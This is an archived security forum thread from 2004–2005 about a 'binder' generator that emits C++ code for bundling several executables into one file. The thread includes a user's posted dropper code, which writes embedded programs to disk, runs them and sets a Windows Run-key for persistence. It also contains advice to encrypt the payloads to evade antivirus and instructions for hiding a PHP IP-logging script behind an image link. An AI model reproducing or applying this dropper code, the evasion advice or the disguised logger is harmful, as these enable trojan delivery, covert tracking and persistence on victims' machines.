Articles

Metasploit Framework Windows Tutorial
Remote Desktop Connection
Windows Processes That May Be Dangerous
How-To use NetCat a Tutorial
Common Linux Commands
Common Ports
Netcat Commands
HTTP Response Codes
War-Google Hack Terms
Wardriving
Avoiding Social Engineering and Phishing Attacks
Intrusion Detection on Linux
Linux Intrusion Detection
Penetration Testing Guide
Penetration Testing Tools
Social Engineering Fundamentals, Part I: Hacker Tactics
Social engineering (computer security)
The Psychology of Social Engineering

The Archives

General GSO
GovernmentSecurity.org News & Suggestions
In The News
Open Topic
General Security Information
Trash Can
Exploit & Vulnerability Mailing List Archives
Trial Member Forum
Product and Program Reviews GSO Tutorials
System Security
Windows Systems
Beginners Section
Linux & Unix Systems
File Downloads
Exploit Research & Discussion Trojan & Virus Errata
Networking Security / Firewall / IDS / VPN / Routers
System Hardening
E-Mail Security
Wifi Security
Trial Member Uploads
Upload discovered Trojans & Mal ware
GSO Programming Section
C , C++ , VC++
Visual Basic.NET
Perl /CGI
Java/Javascript
PHP/XML/ASP/HTML
Assembly + Other
The Cork Board
Network Security Consultant Directory
Network Security Jobs
The Archives
Encryption Information
General Network Security
Internet Anonymity
HTTP Protocol Security
Linux Security
MS IIS Information
Exploit Articles
Programming / Tool Design
GSO Software Projects
Public Downloads
Microsoft Security Questions and Papers
Help - Search - Member List - Calendar
Full Version: Binder Code Generator
GovernmentSecurity.org > System Security > File Downloads
gman24
Apr 28 2004, 03:22 AM
Short description:

Generates code, that when compiled acts like a bound file. Some extra options are there as well like PHP ip logging. The ip can be logged via a remote php file on a web server.

........................................................................................................................
Longer description:

Binder front end, cpp generator
To use, unzip files into a directory run the exe file. If all else fails read the instructions. If the instructions don't answer your question feel free to ask.
No integrated compiler yet.


This generates a cpp file called binddude.cpp in the directory of the program that is compilable right off the bat with dev c++ (unless you use php logging, then must include wininet.lib)

I'm sure since all you have to do is compile the file to create the bound file, you will find this usefull. Bind up to 100 programs with the click of a button smile.gif.

.......................................

All the VB code is mine, some of the C code is mine the rest vnet576's. The php logging portion of the C code is mine. Edit: The php script itself however I got from a friend.

The credits for the original C bind code goto vnet576. You can view his original code, as well as the code to this program at the codelinx forum.

The regkey function in the generated code is a modified version of vnet576's function.
...............................................................

Notes:

You need to set the option to execute the bound file as well as the option to show the bound file running. When you run the frontend program all options are off by default.

The frontend program needs to have hex_dump.exe in the same directory (in zip file).


Read the readme for info on the php logging and option info.

If you use the php logging you need to include wininet.lib in a project (I'm working on bypassing this).


large files may take awhile, you can do them manually (look at vnet's tut) or start them do something else for awhile and come back to it later.

There is a file size limit, not sure what it is yet, this can be increased by changing the code to allow more wait time for the bat files to finish.

Enjoy and please report any bugs.

It creates some files but it cleans up after itself.

Edit: update to 1.5
gman24
Apr 29 2004, 06:31 AM
Thanx, I do have to mention though the PHP script itself isn't mine. It is simple enough script to come up with, but I got it from my friend. The whole idea of using it to log ips in a program and the C code in the program is mine however.
gman24
Apr 29 2004, 08:52 AM
Update:

Updated it now 1.5, minor changes just some tweaking no more bugs found to fix yet. I take it no bugs have been found yet smile.gif.

Feel free to make any suggestions for changes. To the layout, the interface, functions etc.
tibbar
May 12 2004, 10:41 PM
ive done a similar project. if you want to be more secure, then add in a simple algorithm to crypt the hexed programs. this will be guaranteed to beat AV in the long term.
gman24
Jul 4 2004, 03:26 AM
[edit2]Ok, to make this clear this is a php script, but from the outside it functions exactly like an image. Therefore any link or viewing of it will treat it just like an image.

The reason for index.php is to prevent indexing

The log's name is "something"

This will log ips just like the the previous .php file included
[\edit2]

If you would rather it be a image (files attached) than a php file copy the image you want to ima.jpg. upload everything chmod "something" to 777 and change htaccess to .htaccess

Instead of the php file specify four.jpg in the program.

If you are on linux for your desktop and public_html is in your default directory on your shell (not is your default) you can use the scripts I made (in the tar file) to easily set it up. It will set it up in a directory called pie

change directory to where your files are extracted to

If you are using sftp (which I hope you are) these are the commands. You can use the same file with ftp by using the input command (like "ftp site < firstbat") but you need to add your password at the top.

If your account name on your box is the same as the destination you don't need to specify the user.

If this is your first time run
sftp -b firstbat (site)

to update run
sftp -b updatebat (site)

Edit:

If you don't have a shell but only sftp or ftp access or your default is in public_html then remove cd public_html from the bat and it will work in the current directory

for the update bat make cd public_html/pie into cd pie
Infected
Aug 1 2005, 07:11 PM
when I try to compile it with Dev C++, it shows me some errors and doesn't let me compile

what can I do?
tibbar
Aug 1 2005, 07:14 PM
post the errors and perhaps someone will be kind enough to help
Infected
Aug 1 2005, 07:35 PM
CODE
#include <stdio.h>
#include <stdlib.h>
#include <process.h>
#include <windows.h>
void regkey(char thepath[],char filename[],char regname[]);










int main()
{
HANDLE file;
char sysdir[MAX_PATH];
char newfile1[MAX_PATH];
char newfile2[MAX_PATH];
DWORD written;


GetSystemDirectory(sysdir, MAX_PATH);
sprintf(newfile1, "C:\\1.exe");
sprintf(newfile2, "C:\\2.exe");

file = CreateFile& #40;newfile1,GENERIC_WRITE,FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMA
L,0);
WriteFile(file,hexdump1,len1,&written,0);
CloseHandle(file);
file = CreateFile& #40;newfile2,GENERIC_WRITE,FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMA
L,0);
WriteFile(file,hexdump2,len2,&written,0);
CloseHandle(file);



ShellExecute(0, "open",newfile1,NULL, NULL, SW_SHOW);
ShellExecute(0, "open",newfile2,NULL, NULL, SW_SHOW);
ExitProcess(0);
return 0;
}
void regkey(char thepath[],char filename[],char regname[])
{
  HKEY hKey;
   char szData[50];
   char szPath[MAX_PATH];
   char newfolder[MAX_PATH];
   sprintf(newfolder, "%s\\%s", thepath, filename);
   strcpy(szData, "\"" );
   strcat(szData, newfolder);
   strcat(szData, "\"");
   RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, 0, KEY_ALL_ACCESS, NULL, &hKey, NULL);
   RegSetValueEx(hKey, regname, 0, REG_SZ, (LPBYTE)szData, sizeof(szData));
   RegCloseKey(hKey);
   }

QUOTE
C:\binderbinary1.5\binddude.cpp In function `int main()':
30 C:\binderbinary1.5\binddude.cpp `hexdump1' undeclared (first use this function)
  (Each undeclared identifier is reported only once for each function it appears in.)
30 C:\binderbinary1.5\binddude.cpp `len1' undeclared (first use this function)
33 C:\binderbinary1.5\binddude.cpp `hexdump2' undeclared (first use this function)
33 C:\binderbinary1.5\binddude.cpp `len2' undeclared (first use this function)


any idea what went wrong?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2005 Invision Power Services, Inc.